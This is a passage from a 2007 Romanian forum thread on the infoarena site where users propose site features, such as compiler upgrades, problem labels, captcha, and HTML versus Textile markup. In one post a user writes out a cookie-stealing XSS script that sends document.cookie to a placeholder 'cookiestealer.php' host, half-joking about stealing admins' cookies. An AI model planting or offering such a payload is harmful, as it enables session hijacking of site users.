Pagini: 1 2 [3] 4 5 ... 10   În jos
  Imprimă  
Ajutor Subiect: Feature request  (Citit de 85165 ori)
0 Utilizatori şi 1 Vizitator pe acest subiect.
Darth_Niculus
De-al casei
***

Karma: -13
Deconectat Deconectat

Mesaje: 143



Vezi Profilul
« Răspunde #50 : Martie 07, 2007, 11:11:40 »

 Eventual si cu un link un pic detaliat.... cum era pe infoarena 1.0.....
Memorat
devilkind
Echipa infoarena
Nu mai tace
*****

Karma: 284
Deconectat Deconectat

Mesaje: 1.240



Vezi Profilul
« Răspunde #51 : Martie 07, 2007, 12:02:08 »

sau un procent cum e pe timus Thumb up
Memorat
marius21
Strain
*

Karma: -20
Deconectat Deconectat

Mesaje: 27



Vezi Profilul
« Răspunde #52 : Martie 07, 2007, 20:40:57 »

nu credeti ca ar fi mult mai practic ca searchul din forum (si eventual viitorul search din tot site-ul)  sa fie direct in pagina forumului nu ca un link in ea? Very Happy


P.S. a aparut FPC 2.0.4 de mult ar  trebui sa il puneti in loc de FPC-ul vostru 1.9(dar banuiesc ca asta va da peste cap timpurile problemelor fiind un pic mai rapid)
« Ultima modificare: Martie 07, 2007, 20:45:59 de către Petcu Marius » Memorat
sima_cotizo
Vorbaret
****

Karma: 219
Deconectat Deconectat

Mesaje: 596



Vezi Profilul
« Răspunde #53 : Martie 07, 2007, 20:48:20 »

a si MODERNIZATI-va a aparut FPC 2.0.4

Nu cred ca e frumos sa le ceri sa se modernizeze in felul asta...  Shame on you poate era mai frumos sa ii rogi sa faca upgrade la fpc 2.0.4 ... stii ca pe alte siteuri compilatoarele sunt foarte vechi si au chiar si buguri...

Ce ai zice daca cineva ti-ar spune "MODERNIZEAZA-te si treci pe c++, pascal nu mai foloseste nimeni?"... raspunsul tau: "ba da, mai folosesc inca multi elevi..." La fel e si la compilatorul asta!

Succes in continuare!

PS: nu am nimic cu ideea de modernizare ci cu acel CAPS care sugerea un urlet... vad ca ai modificat Smile sorry daca te-a deranjat remarca
« Ultima modificare: Martie 07, 2007, 20:54:09 de către Sima Mihai Cotizo » Memorat
bogdan2412
Echipa infoarena
Nu mai tace
*****

Karma: 410
Deconectat Deconectat

Mesaje: 951



Vezi Profilul
« Răspunde #54 : Martie 07, 2007, 21:04:14 »

FPC-ul vostru 1.9
De unde ai scos-o p-asta?

Unul din job-urile tale: http://infoarena.ro/job_detail/23557
Citat
Compilare:
Free Pascal Compiler version 2.0.4 [2007/01/28] for i386

http://infoarena.ro/documentatie/evaluator
« Ultima modificare: Martie 07, 2007, 21:07:22 de către Bogdan Tataroiu » Memorat
marius21
Strain
*

Karma: -20
Deconectat Deconectat

Mesaje: 27



Vezi Profilul
« Răspunde #55 : Martie 07, 2007, 21:06:37 »

acum cateva saptamani mi s-a parut ca am vazut acolo 1.9 si ceva






PS:sorry de chestia cu "MODERNIZATI-va" nu prea sunt in apele mele azi
Memorat
OmegaLeader
Strain


Karma: -1
Deconectat Deconectat

Mesaje: 3



Vezi Profilul
« Răspunde #56 : Martie 08, 2007, 11:50:59 »

din cate am explorat situ singura chestie care nu mi place e textile sau cum o fi numele. Adik atunci cand am incercat sa mi editez pagina de profil am stat 10 min numa k sa pricep textile, pana la urma am renuntat. eu zic sa folositi (x)html pt ediatarea acelei pagini de profil sau va e frica k cineva va folosi ceva de genu: <script>document.location="http://un_site.ceva/cookiestealer.php?c="+document.cookie);</script>

p a fura cookieurile adminilor  Very Happy, din pacate in forum se pare k nu merge  sad

si propun o sectiune de programare unde spre exemplu sa folosesti php+curl adik o problema sa sune ceva de genu

JonDoe a invatat cateveva despre criptografie, dar problema lui este urmatoarea: de fiecare data cand intra pe situl unui prieten pt a citi annumite notite observa k acestea sunt criptate dar de fiecare data cu un alt algoritm(base2-base64). Ajutati l sa descopere mesajul ascuns

precizari:
pagina de web de unde se iau datele de intrare sa aiba formatul
tip algoritm criptare base2-base64
un text de genu "mai jos este mesajul pt tine"
mesajul criptat

intoarce raspunul k POST la base2_64.php in variabila decrypted. timp maxim de executie 3 sec

mie mi se pare mult mai interesanta o asa problema decat "parcurgeti o matrice in zig zag" sau problema aia Flip
astept pareri
« Ultima modificare: Martie 08, 2007, 12:02:44 de către Dinu Cristian » Memorat
bogdan2412
Echipa infoarena
Nu mai tace
*****

Karma: 410
Deconectat Deconectat

Mesaje: 951



Vezi Profilul
« Răspunde #57 : Martie 08, 2007, 14:18:13 »

Cum poate sa ti se para mai usor XHTML decat Textile?.. ai citit macar articolu de pe site de la documentatie?
Memorat
OmegaLeader
Strain


Karma: -1
Deconectat Deconectat

Mesaje: 3



Vezi Profilul
« Răspunde #58 : Martie 08, 2007, 14:25:23 »

(x)html e mult mai usor de inteles <b> </b> imediat iti dai seama k e scris ingrosat(bold) pe cand la textile nu mai stiu park * deci dupa parerea mea textile =  Thumb down  adik nu am chef sa inv ceva care nu mi este util cu (x)html poti face mult. este doar parerea mea
Memorat
wefgef
Nu mai tace
*****

Karma: 1049
Deconectat Deconectat

Mesaje: 3.008


razboinicu' luminii


Vezi Profilul
« Răspunde #59 : Martie 08, 2007, 14:29:01 »

Nu iti ia mai multe de 10-15 minute sa citesti articolul de pe site de care vorbea si Bogdan... Nu cred ca vei mai avea probleme apoi.   peacefingers
Memorat

omului i-au fost date instinctele pentru a supravietui, nu pentru a fi sclavul lor.
svalentin
Vorbaret
****

Karma: 88
Deconectat Deconectat

Mesaje: 704



Vezi Profilul
« Răspunde #60 : Martie 08, 2007, 18:34:13 »

Sper sa nu par rautacios, dar daca unui om nu ii place un lucru, nu inseamna ca acel lucru este mai prost/ greu de invatat/ <mai adauga ce vrei> Smile (tie iti este probabil mai usor de inteles html fiindca ai mai lucrat cu el..) Daca vrei, putem face un poll in care sa intrebam utilizatorii cum ar vrea sa fie sintaxa paginilor.. Cu (x)html trebuie sa ai grija la mai multe chestii; securitatea fiind una din ele. Oricum, nu cred ca o sa se schimbe, trebuie modificata o bucata maricica din site.. (textila se imbina cu macrourile si alte mici "detalii")

Legat de propunerea ta de probleme - oricum ne mai gandeam sa extindem capabilitatile evaluatorului si la alte limbaje, plus probleme mai practice (parsat xml de exemplu); deci cine stie, poate o sa fie si php suportat Smile
« Ultima modificare: Martie 08, 2007, 18:38:33 de către Valentin Stanciu » Memorat
OmegaLeader
Strain


Karma: -1
Deconectat Deconectat

Mesaje: 3



Vezi Profilul
« Răspunde #61 : Martie 08, 2007, 19:23:58 »

 Embarassed a fost doar o parere si useri sunt deja obisnuiti cu textile. pana la urma am reusit sa l pricep, dar inca nu am reusit sa aflu cum adaugi tabele.

referitor la problema pe care am propus o dak e o poti face si in c/c++ dar ink nu stiu atatea la c/c++, stiti cum e trebuie sa vezi problema din mai multe unghiuri

[eliminat de SsAgEnT]
« Ultima modificare: Martie 08, 2007, 19:44:07 de către Dinu Cristian » Memorat
svalentin
Vorbaret
****

Karma: 88
Deconectat Deconectat

Mesaje: 704



Vezi Profilul
« Răspunde #62 : Martie 08, 2007, 19:39:42 »

legat de pascal:
1. nu mai posta in afara subiectului (desi, am inteles ca nu era principalul subiect)
2. vrei sa spui object oriented pascal, nu delphi; delphi este doar un editor

in C/C++ poti face orice.. conteaza doar cat de mult scrii Smile

(daca vrei, continuam discutia in alt thread, sa ramanem la subiect)
« Ultima modificare: Martie 08, 2007, 19:54:47 de către Valentin Stanciu » Memorat
tudalex
Strain
*

Karma: -8
Deconectat Deconectat

Mesaje: 44



Vezi Profilul
« Răspunde #63 : Martie 08, 2007, 20:40:36 »


JonDoe a invatat cateveva despre criptografie, dar problema lui este urmatoarea: de fiecare data cand intra pe situl unui prieten pt a citi annumite notite observa k acestea sunt criptate dar de fiecare data cu un alt algoritm(base2-base64). Ajutati l sa descopere mesajul ascuns

precizari:
pagina de web de unde se iau datele de intrare sa aiba formatul
tip algoritm criptare base2-base64
un text de genu "mai jos este mesajul pt tine"
mesajul criptat

intoarce raspunul k POST la base2_64.php in variabila decrypted. timp maxim de executie 3 sec

mie mi se pare mult mai interesanta o asa problema decat "parcurgeti o matrice in zig zag" sau problema aia Flip
astept pareri
hmmm....cred ca un site cu astfel de probleme este www.hellboundhackers.org
Have fun!
Scz de offtopic!
Memorat

"Doua lucruri sunt infinite: universul si prostia omeneasca, dar de prima inca nu sunt sigur" Albert Einstein
stef2n
Vorbaret
****

Karma: 218
Deconectat Deconectat

Mesaje: 641



Vezi Profilul
« Răspunde #64 : Martie 20, 2007, 12:31:52 »

Ar fi util ca fiecare problema sa poata primi unul sau mai multe label-uri, astfel incat sa se poata face cautari in arhiva de probleme dupa label. De exemplu, toate problemele din arhiva care au fost date la nationala sa aiba label-ul ONI. La fel de util ar fi sa poata exista cautari in functie de autorul problemei. Smile
Memorat

Exista 10 categorii de oameni: cei care inteleg sistemul binar si cei care nu il inteleg.
svalentin
Vorbaret
****

Karma: 88
Deconectat Deconectat

Mesaje: 704



Vezi Profilul
« Răspunde #65 : Martie 20, 2007, 14:06:15 »

labelurile sunt in plan, dar nu doar pentru probleme Smile
Memorat
sima_cotizo
Vorbaret
****

Karma: 219
Deconectat Deconectat

Mesaje: 596



Vezi Profilul
« Răspunde #66 : Martie 20, 2007, 20:09:01 »

Bine, dar sa nu fie labeluri modificabile... ca se poate sa se ajunga la labeluri "PD" sau "Greedy" sau "Flux".. si ar rezulta impartirea in tipuri de probleme, ceea ce ati zis si voi ca nu prea e obiectivul infoA...
Memorat
bogdan2412
Echipa infoarena
Nu mai tace
*****

Karma: 410
Deconectat Deconectat

Mesaje: 951



Vezi Profilul
« Răspunde #67 : Martie 30, 2007, 08:32:40 »

Forumul infoarena se umple de spam.. Ar trebui sa nu se mai poata posta fara utilizator (anonim)... deja bugurile care erau cu logarea au disparut demult. Si ar fi bine si un captcha pt inregistrare Smile
Memorat
Omega91
Strain
*

Karma: 0
Deconectat Deconectat

Mesaje: 36



Vezi Profilul
« Răspunde #68 : Aprilie 04, 2007, 10:25:50 »

de ce nu mai apare numele userului pe forum si apare doar ID-ul? e un bug?
Memorat
peanutz
Vorbaret
****

Karma: 10
Deconectat Deconectat

Mesaje: 296



Vezi Profilul
« Răspunde #69 : Aprilie 04, 2007, 17:05:57 »

Parca era mai sweet cand ni se vedea numele.. Sad
Memorat

....staind....
wickedman
Echipa infoarena
Nu mai tace
*****

Karma: 227
Deconectat Deconectat

Mesaje: 670



Vezi Profilul WWW
« Răspunde #70 : Aprilie 05, 2007, 14:52:58 »

Ce, e mai bine cu nume?
Memorat
stef2n
Vorbaret
****

Karma: 218
Deconectat Deconectat

Mesaje: 641



Vezi Profilul
« Răspunde #71 : Aprilie 05, 2007, 15:13:46 »

Eu zic ca e mai bine cu ID-uri. Cu nume era prea oficial. Smile
Memorat

Exista 10 categorii de oameni: cei care inteleg sistemul binar si cei care nu il inteleg.
sima_cotizo
Vorbaret
****

Karma: 219
Deconectat Deconectat

Mesaje: 596



Vezi Profilul
« Răspunde #72 : Aprilie 05, 2007, 19:12:34 »

Pe mine ma enerveaza sa mi se zica "ai / n-ai dreptate, sima_cotizo"... bine, dar asta e, ghinionul meu ca mi-am pus tot numele in ID... Smile
Memorat
Omega91
Strain
*

Karma: 0
Deconectat Deconectat

Mesaje: 36



Vezi Profilul
« Răspunde #73 : Aprilie 05, 2007, 22:13:48 »

atuncea punem si id si nume  Whistle
Memorat
CezarMocan
Nu mai tace
*****

Karma: 252
Deconectat Deconectat

Mesaje: 567



Vezi Profilul
« Răspunde #74 : Aprilie 06, 2007, 08:17:09 »

Pe mine ma enerveaza sa mi se zica "ai / n-ai dreptate, sima_cotizo"... bine, dar asta e, ghinionul meu ca mi-am pus tot numele in ID... Smile
Pe tine te stie lumea de Coty... Deci nu-ti face probleme.  peacefingers
Memorat
Pagini: 1 2 [3] 4 5 ... 10   În sus
  Imprimă  
 
Schimbă forumul:  

Powered by SMF 1.1.19 | SMF © 2006-2013, Simple Machines